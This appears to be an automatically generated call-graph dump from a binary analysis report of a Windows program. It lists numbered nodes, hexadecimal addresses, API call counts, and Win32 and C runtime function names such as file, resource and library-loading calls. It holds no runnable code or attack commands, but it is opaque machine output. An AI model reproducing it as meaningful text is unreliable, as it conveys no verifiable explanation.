104886->104896 104889 923b04 104887->104889 104891 902d40 __cinit 67 API calls 104889->104891 104890 902d40 __cinit 67 API calls 104890->104896 104891->104896 104892 923b26 104892->104808 104894 949e4a 89 API calls 104893->104894 104895 8e84c0 69 API calls 104893->104895 104897 8e9ea0 331 API calls 104893->104897 104900 8e8d40 59 API calls 104893->104900 104902 8e9c90 Mailbox 59 API calls 104893->104902 104908 8ef195 104893->104908 104910 8eea78 104893->104910 104972 8e7f77 59 API calls 2 library calls 104893->104972 104975 936e8f 59 API calls 104893->104975 104976 95c5c3 331 API calls 104893->104976 104977 95b53c 331 API calls Mailbox 104893->104977 104979 9593c6 331 API calls Mailbox 104893->104979 104894->104893 104895->104893 104896->104886 104896->104890 104896->104892 104896->104893 104898 8ee95a 104896->104898 104897->104893 104898->104893 104974 949e4a 89 API calls 4 library calls 104898->104974 104900->104893 104902->104893 104978 949e4a 89 API calls 4 library calls 104908->104978 104909 923e25 104909->104808 104910->104808 104912 8ef4ba 104911->104912 104913 8ef650 104911->104913 104914 8ef4c6 104912->104914 104915 92441e 104912->104915 104916 8e7de1 59 API calls 104913->104916 105078 8ef290 331 API calls 2 library calls 104914->105078 105079 95bc6b 331 API calls Mailbox 104915->105079 104922 8ef58c Mailbox 104916->104922 104919 92442c 104923 8ef630 104919->104923 105080 949e4a 89 API calls 4 library calls 104919->105080 104921 8ef4fd 104921->104919 104921->104922 104921->104923 104980 95445a 104922->104980 104989 943c37 104922->104989 104992 94cb7a 104922->104992 105072 8e4e4a 104922->105072 104923->104808 104924 8e9c90 Mailbox 59 API calls 104925 8ef5e3 104924->104925 104925->104923 104925->104924 104931 8e3212 104930->104931 104932 8e31e0 104930->104932 104931->104808 104932->104931 104933 8e3205 IsDialogMessageW 104932->104933 104934 91cf32 GetClassLongW 104932->104934 104933->104931 104933->104932 104934->104932 104934->104933 104935->104808 104936->104737 104937->104742 104938->104808 104939->104747 104940->104747 104941->104747 104942->104808 104943->104808 104944->104808 104946 8e9851 104945->104946 104955 8e984b 104945->104955 104947 91f5d3 __i64tow 104946->104947 104948 8e9899 104946->104948 104950 8e9857 __itow 104946->104950 104953 91f4da 104946->104953 106047 903698 83 API calls 4 library calls 104948->106047 104952 900db6 Mailbox 59 API calls 104950->104952 104954 8e9871 104952->104954 104956 900db6 Mailbox 59 API calls 104953->104956 104961 91f552 Mailbox _wcscpy 104953->104961 104954->104955 104957 8e7de1 59 API calls 104954->104957 104955->104808 104958 91f51f 104956->104958 104957->104955 104959 900db6 Mailbox 59 API calls 104958->104959 104960 91f545 104959->104960 104960->104961 104962 8e7de1 59 API calls 104960->104962 106048 903698 83 API calls 4 library calls 104961->106048 104962->104961 104963->104808 104964->104808 104965->104794 104966->104794 104967->104794 104968->104794 104969->104794 104970->104794 104971->104794 104972->104893 104973->104893 104974->104893 104975->104893 104976->104893 104977->104893 104978->104909 104979->104893 104981 8e9837 84 API calls 104980->104981 104982 954494 104981->104982 105081 8e6240 104982->105081 104984 9544c9 104988 9544cd 104984->104988 105106 8e9a98 59 API calls Mailbox 104984->105106 104985 9544a4 104985->104984 104986 8e9ea0 331 API calls 104985->104986 104986->104984 104988->104925 105126 94445a GetFileAttributesW 104989->105126 104993 8e7667 59 API calls 104992->104993 104994 94cbaf 104993->104994 104995 8e7667 59 API calls 104994->104995 104996 94cbb8 104995->104996 104997 94cbcc 104996->104997 105326 8e9b3c 59 API calls 104996->105326 104999 8e9837 84 API calls 104997->104999 105000 94cbe9 104999->105000 105001 94ccea 105000->105001 105002 94cc0b 105000->105002 105007 94cd1a Mailbox 105000->105007 105130 8e4ddd 105001->105130 105003 8e9837 84 API calls 105002->105003 105005 94cc17 105003->105005 105008 8e8047 59 API calls 105005->105008 105007->104925 105011 94cc23 105008->105011 105009 94cd16 105009->105007 105010 8e7667 59 API calls 105009->105010 105013 94cd4b 105010->105013 105016 94cc37 105011->105016 105017 94cc69 105011->105017 105012 8e4ddd 136 API calls 105012->105009 105014 8e7667 59 API calls 105013->105014 105015 94cd54 105014->105015 105019 8e7667 59 API calls 105015->105019 105020 8e8047 59 API calls 105016->105020 105018 8e9837 84 API calls 105017->105018 105021 94cc76 105018->105021 105022 94cd5d 105019->105022 105023 94cc47 105020->105023 105024 8e8047 59 API calls 105021->105024 105025 8e7667 59 API calls 105022->105025 105026 8e7cab 59 API calls 105023->105026 105027 94cc82 105024->105027 105028 94cd66 105025->105028 105029 94cc51 105026->105029 105327 944a31 GetFileAttributesW 105027->105327 105032 8e9837 84 API calls 105028->105032 105030 8e9837 84 API calls 105029->105030 105033 94cc5d 105030->105033 105035 94cd73 105032->105035 105036 8e7b2e 59 API calls 105033->105036 105034 94cc8b 105037 94cc9e 105034->105037 105040 8e79f2 59 API calls 105034->105040 105154 8e459b 105035->105154 105036->105017 105039 8e9837 84 API calls 105037->105039 105047 94cca4 105037->105047 105042 94cccb 105039->105042 105040->105037 105041 94cd8e 105205 8e79f2 105041->105205 105328 9437ef 75 API calls Mailbox 105042->105328 105046 94cdd1 105049 8e8047 59 API calls 105046->105049 105047->105007 105048 8e79f2 59 API calls 105050 94cdae 105048->105050 105051 94cddf 105049->105051 105050->105046 105053 8e7bcc 59 API calls 105050->105053 105208 8e7b2e 105051->105208 105055 94cdc3 105053->105055 105057 8e7bcc 59 API calls 105055->105057 105056 8e7b2e 59 API calls 105058 94cdfb 105056->105058 105057->105046 105059 8e7b2e 59 API calls 105058->105059 105060 94ce09 105059->105060 105061 8e9837 84 API calls 105060->105061 105062 94ce15 105061->105062 105217 944071 105062->105217 105064 94ce26 105065 943c37 3 API calls 105064->105065 105066 94ce30 105065->105066 105067 8e9837 84 API calls 105066->105067 105071 94ce61 105066->105071 105068 94ce4e 105067->105068 105271 949155 105068->105271 105070 8e4e4a 84 API calls 105070->105007 105071->105070 105073 8e4e5b 105072->105073 105074 8e4e54 105072->105074 105076 8e4e6a 105073->105076 105077 8e4e7b FreeLibrary 105073->105077 105075 9053a6 __fcloseall 83 API calls 105074->105075 105075->105073 105076->104925 105077->105076 105078->104921 105079->104919 105080->104923 105107 8e7a16 105081->105107 105083 8e646a 105114 8e750f 105083->105114 105085 8e6484 Mailbox 105085->104985 105088 8e6265 105088->105083 105089 91dff6 105088->105089 105092 8e750f 59 API calls 105088->105092 105094 8e7d8c 59 API calls 105088->105094 105098 91df92 105088->105098 105102 8e7e4f 59 API calls 105088->105102 105105 8e6799 _memmove 105088->105105 105112 8e5f6c 60 API calls 105088->105112 105113 8e5d41 59 API calls Mailbox 105088->105113 105122 8e5e72 60 API calls 105088->105122 105123 8e7924 59 API calls 2 library calls 105088->105123 105124 93f8aa 91 API calls 4 library calls 105089->105124 105092->105088 105094->105088 105095 91e004 105096 8e750f 59 API calls 105095->105096 105097 91e01a 105096->105097 105097->105085 105099 8e8029 59 API calls 105098->105099 105101 91df9d 105099->105101 105104 900db6 Mailbox 59 API calls 105101->105104 105103 8e643b CharUpperBuffW 105102->105103 105103->105088 105104->105105 105125 93f8aa 91 API calls 4 library calls 105105->105125 105106->104988 105108 900db6 Mailbox 59 API calls 105107->105108 105109 8e7a3b 105108->105109 105110 8e8029 59 API calls 105109->105110 105111 8e7a4a 105110->105111 105111->105088 105112->105088 105113->105088 105115 8e75af 105114->105115 105118 8e7522 _memmove 105114->105118 105117 900db6 Mailbox 59 API calls 105115->105117 105116 900db6 Mailbox 59 API calls 105119 8e7529 105116->105119 105117->105118 105118->105116 105120 900db6 Mailbox 59 API calls 105119->105120 105121 8e7552 105119->105121 105120->105121 105121->105085 105122->105088 105123->105088 105124->105095 105125->105085 105127 943c3e 105126->105127 105128 944475 FindFirstFileW 105126->105128 105127->104925 105128->105127 105129 94448a FindClose 105128->105129 105129->105127 105329 8e4bb5 105130->105329 105135 8e4e08 LoadLibraryExW 105339 8e4b6a 105135->105339 105136 91d8e6 105138 8e4e4a 84 API calls 105136->105138 105140 91d8ed 105138->105140 105142 8e4b6a 3 API calls 105140->105142 105144 91d8f5 105142->105144 105143 8e4e2f 105143->105144 105145 8e4e3b 105143->105145 105365 8e4f0b 105144->105365 105147 8e4e4a 84 API calls 105145->105147 105149 8e4e40 105147->105149 105149->105009 105149->105012 105151 91d91c 105373 8e4ec7 105151->105373 105155 8e7667 59 API calls 105154->105155 105156 8e45b1 105155->105156 105157 8e7667 59 API calls 105156->105157 105158 8e45b9 105157->105158 105159 8e7667 59 API calls 105158->105159 105160 8e45c1 105159->105160 105161 8e7667 59 API calls 105160->105161 105162 8e45c9 105161->105162 105163 91d4d2 105162->105163 105164 8e45fd 105162->105164 105165 8e8047 59 API calls 105163->105165 105166 8e784b 59 API calls 105164->105166 105167 91d4db 105165->105167 105168 8e460b 105166->105168 105169 8e7d8c 59 API calls 105167->105169 105170 8e7d2c 59 API calls 105168->105170 105172 8e4640 105169->105172 105171 8e4615 105170->105171 105171->105172 105173 8e784b 59 API calls 105171->105173 105175 8e465f 105172->105175 105176 91d4fb 105172->105176 105191 8e4680 105172->105191 105177 8e4636 105173->105177 105181 8e79f2 59 API calls 105175->105181 105179 91d5cb 105176->105179 105187 91d5b4 105176->105187 105199 91d532 105176->105199 105180 8e7d2c 59 API calls 105177->105180 105178 8e4691 105182 8e46a3 105178->105182 105184 8e8047 59 API calls 105178->105184 105183 8e7bcc 59 API calls 105179->105183 105180->105172 105185 8e4669 105181->105185 105186 8e8047 59 API calls 105182->105186 105189 8e46b3 105182->105189 105200 91d588 105183->105200 105184->105182 105190 8e784b 59 API calls 105185->105190 105185->105191 105186->105189 105187->105179 105195 91d59f 105187->105195 105188 8e46ba 105193 8e8047 59 API calls 105188->105193 105202 8e46c1 Mailbox 105188->105202 105189->105188 105192 8e8047 59 API calls 105189->105192 105190->105191 105657 8e784b 105191->105657 105192->105188 105193->105202 105194 8e79f2 59 API calls 105194->105200 105198 8e7bcc 59 API calls 105195->105198 105196 91d590 105197 8e7bcc 59 API calls 105196->105197 105197->105200 105198->105200 105199->105196 105203 91d57b 105199->105203 105200->105191 105200->105194 105670 8e7924 59 API calls 2 library calls 105200->105670 105202->105041 105204 8e7bcc 59 API calls 105203->105204 105204->105200 105206 8e7e4f 59 API calls 105205->105206 105207 8e79fd 105206->105207 105207->105046 105207->105048 105209 91ec6b 105208->105209 105210 8e7b40 105208->105210 105678 937bdb 59 API calls _memmove 105209->105678 105672 8e7a51 105210->105672 105213 8e7b4c 105213->105056 105214 91ec75 105215 8e8047 59 API calls 105214->105215 105216 91ec7d Mailbox 105215->105216 105218 94408d 105217->105218 105219 9440a0 105218->105219 105220 944092 105218->105220 105222 8e7667 59 API calls 105219->105222 105221 8e8047 59 API calls 105220->105221 105270 94409b Mailbox 105221->105270 105223 9440a8 105222->105223 105224 8e7667 59 API calls 105223->105224 105225 9440b0 105224->105225 105226 8e7667 59 API calls 105225->105226 105227 9440bb 105226->105227 105228 8e7667 59 API calls 105227->105228 105229 9440c3 105228->105229 105230 8e7667 59 API calls 105229->105230 105231 9440cb 105230->105231 105232 8e7667 59 API calls 105231->105232 105233 9440d3 105232->105233 105234 8e7667 59 API calls 105233->105234 105235 9440db 105234->105235 105236 8e7667 59 API calls 105235->105236 105237 9440e3 105236->105237 105238 8e459b 59 API calls 105237->105238 105239 9440fa 105238->105239 105240 8e459b 59 API calls 105239->105240 105241 944113 105240->105241 105242 8e79f2 59 API calls 105241->105242 105243 94411f 105242->105243 105244 944132 105243->105244 105245 8e7d2c 59 API calls 105243->105245 105246 8e79f2 59 API calls 105244->105246 105245->105244 105247 94413b 105246->105247 105248 94414b 105247->105248 105249 8e7d2c 59 API calls 105247->105249 105250 8e8047 59 API calls 105248->105250 105249->105248 105251 944157 105250->105251 105252 8e7b2e 59 API calls 105251->105252 105253 944163 105252->105253 105679 944223 59 API calls 105253->105679 105255 944172 105680 944223 59 API calls 105255->105680 105257 944185 105258 8e79f2 59 API calls 105257->105258 105259 94418f 105258->105259 105260 944194 105259->105260 105261 9441a6 105259->105261 105262 8e7cab 59 API calls 105260->105262 105263 8e79f2 59 API calls 105261->105263 105269 9441a1 105262->105269 105264 9441af 105263->105264 105265 9441cd 105264->105265 105268 8e7cab 59 API calls 105264->105268 105267 8e7b2e 59 API calls 105265->105267 105266 8e7b2e 59 API calls 105266->105265 105267->105270 105268->105269 105269->105266 105270->105064 105272 949162 __write_nolock 105271->105272 105273 900db6 Mailbox 59 API calls 105272->105273 105274 9491bf 105273->105274 105275 8e522e 59 API calls 105274->105275 105276 9491c9 105275->105276 105277 948f5f GetSystemTimeAsFileTime 105276->105277 105278 9491d4 105277->105278 105279 8e4ee5 85 API calls 105278->105279 105280 9491e7 _wcscmp 105279->105280 105281 9492b8 105280->105281 105282 94920b 105280->105282 105283 949734 96 API calls 105281->105283 105711 949734 105282->105711 105299 949284 _wcscat 105283->105299 105287 8e4f0b 74 API calls 105289 9492dd 105287->105289 105288 9492c1 105288->105071 105290 8e4f0b 74 API calls 105289->105290 105291 9492ed 105290->105291 105293 8e4f0b 74 API calls 105291->105293 105292 949239 _wcscat _wcscpy 105718 9040fb 58 API calls __wsplitpath_helper 105292->105718 105295 949308 105293->105295 105296 8e4f0b 74 API calls 105295->105296 105297 949318 105296->105297 105298 8e4f0b 74 API calls 105297->105298 105300 949333 105298->105300 105299->105287 105299->105288 105301 8e4f0b 74 API calls 105300->105301 105302 949343 105301->105302 105303 8e4f0b 74 API calls 105302->105303 105304 949353 105303->105304 105305 8e4f0b 74 API calls 105304->105305 105306 949363 105305->105306 105681 9498e3 GetTempPathW GetTempFileNameW 105306->105681 105308 94936f 105309 90525b 115 API calls 105308->105309 105311 949380 105309->105311 105311->105288 105313 8e4f0b 74 API calls 105311->105313 105324 94943a 105311->105324 105682 904863 105311->105682 105312 949445 105314 94945f 105312->105314 105315 94944b DeleteFileW 105312->105315 105313->105311 105316 949505 CopyFileW 105314->105316 105321 949469 _wcsncpy 105314->105321 105315->105288 105317 94952d DeleteFileW 105316->105317 105318 94951b DeleteFileW 105316->105318 105708 9498a2 CreateFileW 105317->105708 105318->105288 105719 948b06 105321->105719 105695 9053a6 105324->105695 105325 9494f4 DeleteFileW 105325->105288 105326->104997 105327->105034 105328->105047 105378 8e4c03 105329->105378 105332 8e4c03 2 API calls 105335 8e4bdc 105332->105335 105333 8e4bec FreeLibrary 105334 8e4bf5 105333->105334 105336 90525b 105334->105336 105335->105333 105335->105334 105382 905270 105336->105382 105338 8e4dfc 105338->105135 105338->105136 105463 8e4c36 105339->105463 105341 8e4b8f 105344 8e4baa 105341->105344 105345 8e4ba1 FreeLibrary 105341->105345 105343 8e4c36 2 API calls 105343->105341 105346 8e4c70 105344->105346 105345->105344 105347 900db6 Mailbox 59 API calls 105346->105347 105348 8e4c85 105347->105348 105349 8e522e 59 API calls 105348->105349 105350 8e4c91 _memmove 105349->105350 105351 8e4ccc 105350->105351 105353 8e4d89 105350->105353 105354 8e4dc1 105350->105354 105352 8e4ec7 69 API calls 105351->105352 105357 8e4cd5 105352->105357 105467 8e4e89 CreateStreamOnHGlobal 105353->105467 105478 94991b 95 API calls 105354->105478 105358 8e4f0b 74 API calls 105357->105358 105360 91d8a7 105357->105360 105364 8e4d69 105357->105364 105473 8e4ee5 105357->105473 105358->105357 105361 8e4ee5 85 API calls 105360->105361 105362 91d8bb 105361->105362 105363 8e4f0b 74 API calls 105362->105363 105363->105364 105364->105143 105366 8e4f1d 105365->105366 105369 91d9cd 105365->105369 105502 9055e2 105366->105502 105370 949109 105634 948f5f 105370->105634 105372 94911f 105372->105151 105374 91d990 105373->105374 105375 8e4ed6 105373->105375 105639 905c60 105375->105639 105377 8e4ede 105379 8e4bd0 105378->105379 105380 8e4c0c LoadLibraryA 105378->105380 105379->105332 105379->105335 105380->105379 105381 8e4c1d GetProcAddress 105380->105381 105381->105379 105384 90527c __freefls@4 105382->105384 105383 90528f 105431 908b28 58 API calls __getptd_noexit 105383->105431 105384->105383 105386 9052c0 105384->105386 105401 9104e8 105386->105401 105387 905294 105432 908db6 9 API calls __wctomb_s_l 105387->105432 105390 9052c5 105391 9052db 105390->105391 105392 9052ce 105390->105392 105394 905305 105391->105394 105395 9052e5 105391->105395 105433 908b28 58 API calls __getptd_noexit 105392->105433 105416 910607 105394->105416 105434 908b28 58 API calls __getptd_noexit 105395->105434 105397 90529f @_EH4_CallFilterFunc@8 __freefls@4 105397->105338 105402 9104f4 __freefls@4 105401->105402 105403 909c0b __lock 58 API calls 105402->105403 105410 910502 105403->105410 105404 910576 105436 9105fe 105404->105436 105405 91057d 105441 90881d 58 API calls 2 library calls 105405->105441 105408 910584 105408->105404 105442 909e2b InitializeCriticalSectionAndSpinCount 105408->105442 105409 9105f3 __freefls@4 105409->105390 105410->105404 105410->105405 105412 909c93 __mtinitlocknum 58 API calls 105410->105412 105439 906c50 59 API calls __lock 105410->105439 105440 906cba LeaveCriticalSection LeaveCriticalSection _doexit 105410->105440 105412->105410 105414 9105aa EnterCriticalSection 105414->105404 105424 910627 __wopenfile 105416->105424 105417 910641 105447 908b28 58 API calls __getptd_noexit 105417->105447 105419 9107fc 105419->105417 105423 91085f 105419->105423 105420 910646 105448 908db6 9 API calls __wctomb_s_l 105420->105448 105422 905310 105435 905332 LeaveCriticalSection LeaveCriticalSection _fseek 105422->105435 105444 9185a1 105423->105444 105424->105417 105424->105419 105449 9037cb 60 API calls 3 library calls 105424->105449 105427 9107f5 105427->105419 105450 9037cb 60 API calls 3 library calls 105427->105450 105429 910814 105429->105419 105451 9037cb 60 API calls 3 library calls 105429->105451 105431->105387 105432->105397 105433->105397 105434->105397 105435->105397 105443 909d75 LeaveCriticalSection 105436->105443 105438 910605 105438->105409 105439->105410 105440->105410 105441->105408 105442->105414 105443->105438 105452 917d85 105444->105452 105446 9185ba 105446->105422 105447->105420 105448->105422 105449->105427 105450->105429 105451->105419 105455 917d91 __freefls@4 105452->105455 105453 917da7 105454 908b28 __fseek_nolock 58 API calls 105453->105454 105456 917dac 105454->105456 105455->105453 105457 917ddd 105455->105457 105458 908db6 __wctomb_s_l 9 API calls 105456->105458 105459 917e4e __wsopen_nolock 109 API calls 105457->105459 105462 917db6 __freefls@4 105458->105462 105460 917df9 105459->105460 105461 917e22 __wsopen_helper LeaveCriticalSection 105460->105461 105461->105462 105462->105446 105464 8e4b83 105463->105464 105465 8e4c3f LoadLibraryA 105463->105465 105464->105341 105464->105343 105465->105464 105466 8e4c50 GetProcAddress 105465->105466 105466->105464 105468 8e4ea3 FindResourceExW 105467->105468 105472 8e4ec0 105467->105472 105469 91d933 LoadResource 105468->105469 105468->105472 105470 91d948 SizeofResource 105469->105470 105469->105472 105471 91d95c LockResource 105470->105471 105470->105472 105471->105472 105472->105351 105474 91d9ab 105473->105474 105475 8e4ef4 105473->105475 105479 90584d 105475->105479 105477 8e4f02 105477->105357 105478->105351 105483 905859 __freefls@4 105479->105483 105480 90586b 105492 908b28 58 API calls __getptd_noexit 105480->105492 105482 905891 105494 906c11 105482->105494 105483->105480 105483->105482 105484 905870 105493 908db6 9 API calls __wctomb_s_l 105484->105493 105489 9058a6 105501 9058c8 LeaveCriticalSection LeaveCriticalSection _fseek 105489->105501 105491 90587b __freefls@4 105491->105477 105492->105484 105493->105491 105495 906c21 105494->105495 105496 906c43 EnterCriticalSection 105494->105496 105495->105496 105498 906c29 105495->105498 105497 905897 105496->105497 105500 9057be 83 API calls 4 library calls 105497->105500 105499 909c0b __lock 58 API calls 105498->105499 105499->105497 105500->105489 105501->105491 105505 9055fd 105502->105505 105504 8e4f2e 105504->105370 105506 905609 __freefls@4 105505->105506 105507 90564c 105506->105507 105508 905644 __freefls@4 105506->105508 105513 90561f _memset 105506->105513 105509 906c11 __lock_file 59 API calls 105507->105509 105508->105504 105510 905652 105509->105510 105518 90541d 105510->105518 105532 908b28 58 API calls __getptd_noexit 105513->105532 105514 905639 105533 908db6 9 API calls __wctomb_s_l 105514->105533 105519 905453 105518->105519 105522 905438 _memset 105518->105522 105534 905686 LeaveCriticalSection LeaveCriticalSection _fseek 105519->105534 105520 905443 105630 908b28 58 API calls __getptd_noexit 105520->105630 105522->105519 105522->105520 105524 905493 105522->105524 105524->105519 105526 9055a4 _memset 105524->105526 105535 9046e6 105524->105535 105542 910e5b 105524->105542 105610 910ba7 105524->105610 105632 910cc8 58 API calls 4 library calls 105524->105632 105633 908b28 58 API calls __getptd_noexit 105526->105633 105531 905448 105631 908db6 9 API calls __wctomb_s_l 105531->105631 105532->105514 105533->105508 105534->105508 105536 9046f0 105535->105536 105537 904705 105535->105537 105538 908b28 __fseek_nolock 58 API calls 105536->105538 105537->105524 105539 9046f5 105538->105539 105540 908db6 __wctomb_s_l 9 API calls 105539->105540 105541 904700 105540->105541 105541->105524 105543 910e93 105542->105543 105544 910e7c 105542->105544 105546 9115cb 105543->105546 105551 910ecd 105543->105551 105545 908af4 __read_nolock 58 API calls 105544->105545 105548 910e81 105545->105548 105547 908af4 __read_nolock 58 API calls 105546->105547 105549 9115d0 105547->105549 105550 908b28 __fseek_nolock 58 API calls 105548->105550 105553 908b28 __fseek_nolock 58 API calls 105549->105553 105590 910e88 105550->105590 105552 910ed5 105551->105552 105559 910eec 105551->105559 105554 908af4 __read_nolock 58 API calls 105552->105554 105555 910ee1 105553->105555 105556 910eda 105554->105556 105557 908db6 __wctomb_s_l 9 API calls 105555->105557 105560 908b28 __fseek_nolock 58 API calls 105556->105560 105557->105590 105558 910f01 105561 908af4 __read_nolock 58 API calls 105558->105561 105559->105558 105562 910f1b 105559->105562 105563 910f39 105559->105563 105559->105590 105560->105555 105561->105556 105562->105558 105565 910f26 105562->105565 105564 90881d __malloc_crt 58 API calls 105563->105564 105566 910f49 105564->105566 105567 915c6b __stbuf 58 API calls 105565->105567 105568 910f51 105566->105568 105569 910f6c 105566->105569 105570 91103a 105567->105570 105571 908b28 __fseek_nolock 58 API calls 105568->105571 105573 9118c1 __lseeki64_nolock 60 API calls 105569->105573 105572 9110b3 ReadFile 105570->105572 105577 911050 GetConsoleMode 105570->105577 105574 910f56 105571->105574 105575 911593 GetLastError 105572->105575 105576 9110d5 105572->105576 105573->105565 105578 908af4 __read_nolock 58 API calls 105574->105578 105579 9115a0 105575->105579 105580 911093 105575->105580 105576->105575 105584 9110a5 105576->105584 105581 9110b0 105577->105581 105582 911064 105577->105582 105578->105590 105583 908b28 __fseek_nolock 58 API calls 105579->105583 105587 908b07 __dosmaperr 58 API calls 105580->105587 105592 911099 105580->105592 105581->105572 105582->105581 105585 91106a ReadConsoleW 105582->105585 105588 9115a5 105583->105588 105584->105592 105593 91110a 105584->105593 105594 911377 105584->105594 105585->105584 105586 91108d GetLastError 105585->105586 105586->105580 105587->105592 105589 908af4 __read_nolock 58 API calls 105588->105589 105589->105592 105590->105524 105591 902d55 _free 58 API calls 105591->105590 105592->105590 105592->105591 105596 911176 ReadFile 105593->105596 105602 9111f7 105593->105602 105594->105592 105600 91147d ReadFile 105594->105600 105597 911197 GetLastError 105596->105597 105603 9111a1 105596->105603 105597->105603 105598 9112b4 105605 9118c1 __lseeki64_nolock 60 API calls 105598->105605 105607 911264 MultiByteToWideChar 105598->105607 105599 9112a4 105604 908b28 __fseek_nolock 58 API calls 105599->105604 105601 9114a0 GetLastError 105600->105601 105609 9114ae 105600->105609 105601->105609 105602->105592 105602->105598 105602->105599 105602->105607 105603->105593 105606 9118c1 __lseeki64_nolock 60 API calls 105603->105606 105604->105592 105605->105607 105606->105603 105607->105586 105607->105592 105608 9118c1 __lseeki64_nolock 60 API calls 105608->105609 105609->105594 105609->105608 105611 910bb2 105610->105611 105615 910bc7 105610->105615 105612 908b28 __fseek_nolock 58 API calls 105611->105612 105613 910bb7 105612->105613 105614 908db6 __wctomb_s_l 9 API calls 105613->105614 105624 910bc2 105614->105624 105616 910bfc 105615->105616 105617 915fe4 __getbuf 58 API calls 105615->105617 105615->105624 105618 9046e6 __fseek_nolock 58 API calls 105616->105618 105617->105616 105619 910c10 105618->105619 105620 910d47 __read 72 API calls 105619->105620 105621 910c17 105620->105621 105622 9046e6 __fseek_nolock 58 API calls 105621->105622 105621->105624 105623 910c3a 105622->105623 105623->105624 105625 9046e6 __fseek_nolock 58 API calls 105623->105625 105624->105524 105626 910c46 105625->105626 105626->105624 105627 9046e6 __fseek_nolock 58 API calls 105626->105627 105628 910c53 105627->105628 105629 9046e6 __fseek_nolock 58 API calls 105628->105629 105629->105624 105630->105531 105631->105519 105632->105524 105633->105531 105637 90520a GetSystemTimeAsFileTime 105634->105637 105636 948f6e 105636->105372 105638 905238 __aulldiv 105637->105638 105638->105636 105640 905c6c __freefls@4 105639->105640 105641 905c93 105640->105641 105642 905c7e 105640->105642 105644 906c11 __lock_file 59 API calls 105641->105644 105653 908b28 58 API calls __getptd_noexit 105642->105653 105646 905c99 105644->105646 105645 905c83 105654 908db6 9 API calls __wctomb_s_l 105645->105654 105655 9058d0 67 API calls 6 library calls 105646->105655 105649 905ca4 105656 905cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105649->105656 105651 905cb6 105652 905c8e __freefls@4 105651->105652 105652->105377 105653->105645 105654->105652 105655->105649 105656->105651 105658 8e785a 105657->105658 105659 8e78b7 105657->105659 105658->105659 105661 8e7865 105658->105661 105660 8e7d2c 59 API calls 105659->105660 105667 8e7888 _memmove 105660->105667 105662 91eb09 105661->105662 105663 8e7880 105661->105663 105664 8e8029 59 API calls 105662->105664 105671 8e7f27 59 API calls Mailbox 105663->105671 105666 91eb13 105664->105666 105668 900db6 Mailbox 59 API calls 105666->105668 105667->105178 105669 91eb33 105668->105669 105670->105200 105671->105667 105673 8e7a85 _memmove 105672->105673 105674 8e7a5f 105672->105674 105673->105213 105673->105673 105674->105673 105675 900db6 Mailbox 59 API calls 105674->105675 105676 8e7ad4 105675->105676 105677 900db6 Mailbox 59 API calls 105676->105677 105677->105673 105678->105214 105679->105255 105680->105257 105681->105308 105683 90486f __freefls@4 105682->105683 105684 9048a5 105683->105684 105685 90488d 105683->105685 105687 90489d __freefls@4 105683->105687 105688 906c11 __lock_file 59 API calls 105684->105688 105762 908b28 58 API calls __getptd_noexit 105685->105762 105687->105311 105690 9048ab 105688->105690 105689 904892 105763 908db6 9 API calls __wctomb_s_l 105689->105763 105750 90470a 105690->105750 105696 9053b2 __freefls@4 105695->105696 105697 9053c6 105696->105697 105699 9053de 105696->105699 105932 908b28 58 API calls __getptd_noexit 105697->105932 105701 9053d6 __freefls@4 105699->105701 105702 906c11 __lock_file 59 API calls 105699->105702 105700 9053cb 105933 908db6 9 API calls __wctomb_s_l 105700->105933 105701->105312 105704 9053f0 105702->105704 105916 90533a 105704->105916 105709 9498de 105708->105709 105710 9498c8 SetFileTime CloseHandle 105708->105710 105709->105288 105710->105709 105714 949748 __tzset_nolock _wcscmp 105711->105714 105712 949109 GetSystemTimeAsFileTime 105712->105714 105713 8e4f0b 74 API calls 105713->105714 105714->105712 105714->105713 105715 949210 105714->105715 105716 8e4ee5 85 API calls 105714->105716 105715->105288 105717 9040fb 58 API calls __wsplitpath_helper 105715->105717 105716->105714 105717->105292 105718->105299 105720 948b11 105719->105720 105722 948b1f 105719->105722 105721 90525b 115 API calls 105720->105721 105721->105722 105723 948b64 105722->105723 105724 90525b 115 API calls 105722->105724 105749 948b28 105722->105749 106005 948d91 105723->106005 105726 948b49 105724->105726 105726->105723 105728 948b52 105726->105728 105727 948ba8 105729 948bac 105727->105729 105730 948bcd 105727->105730 105732 9053a6 __fcloseall 83 API calls 105728->105732 105728->105749 105731 948bb9 105729->105731 105734 9053a6 __fcloseall 83 API calls 105729->105734 106009 9489a9 105730->106009 105738 9053a6 __fcloseall 83 API calls 105731->105738 105731->105749 105732->105749 105734->105731 105738->105749 105749->105317 105749->105325 105753 904719 105750->105753 105757 904737 105750->105757 105751 904727 105793 908b28 58 API calls __getptd_noexit 105751->105793 105753->105751 105753->105757 105760 904751 _memmove 105753->105760 105754 90472c 105794 908db6 9 API calls __wctomb_s_l 105754->105794 105764 9048dd LeaveCriticalSection LeaveCriticalSection _fseek 105757->105764 105759 9046e6 __fseek_nolock 58 API calls 105759->105760 105760->105757 105760->105759 105765 90d886 105760->105765 105795 904a3d 105760->105795 105801 90ae1e 78 API calls 5 library calls 105760->105801 105762->105689 105763->105687 105764->105687 105766 90d892 __freefls@4 105765->105766 105767 90d8b6 105766->105767 105768 90d89f 105766->105768 105770 90d955 105767->105770 105772 90d8ca 105767->105772 105875 908af4 58 API calls __getptd_noexit 105768->105875 105881 908af4 58 API calls __getptd_noexit 105770->105881 105771 90d8a4 105876 908b28 58 API calls __getptd_noexit 105771->105876 105775 90d8f2 105772->105775 105776 90d8e8 105772->105776 105802 90d206 105775->105802 105877 908af4 58 API calls __getptd_noexit 105776->105877 105777 90d8ed 105882 908b28 58 API calls __getptd_noexit 105777->105882 105784 90d961 105883 908db6 9 API calls __wctomb_s_l 105784->105883 105787 90d8ab __freefls@4 105787->105760 105793->105754 105794->105757 105796 904a50 105795->105796 105800 904a74 105795->105800 105797 9046e6 __fseek_nolock 58 API calls 105796->105797 105796->105800 105798 904a6d 105797->105798 105799 90d886 __write 78 API calls 105798->105799 105799->105800 105800->105760 105801->105760 105803 90d212 __freefls@4 105802->105803 105804 90d261 EnterCriticalSection 105803->105804 105806 909c0b __lock 58 API calls 105803->105806 105805 90d287 __freefls@4 105804->105805 105807 90d237 105806->105807 105875->105771 105876->105787 105877->105777 105881->105777 105882->105784 105883->105787 105917 905349 105916->105917 105918 90535d 105916->105918 105965 908b28 58 API calls __getptd_noexit 105917->105965 105920 905359 105918->105920 105922 904a3d __flush 78 API calls 105918->105922 105934 905415 LeaveCriticalSection LeaveCriticalSection _fseek 105920->105934 105921 90534e 105966 908db6 9 API calls __wctomb_s_l 105921->105966 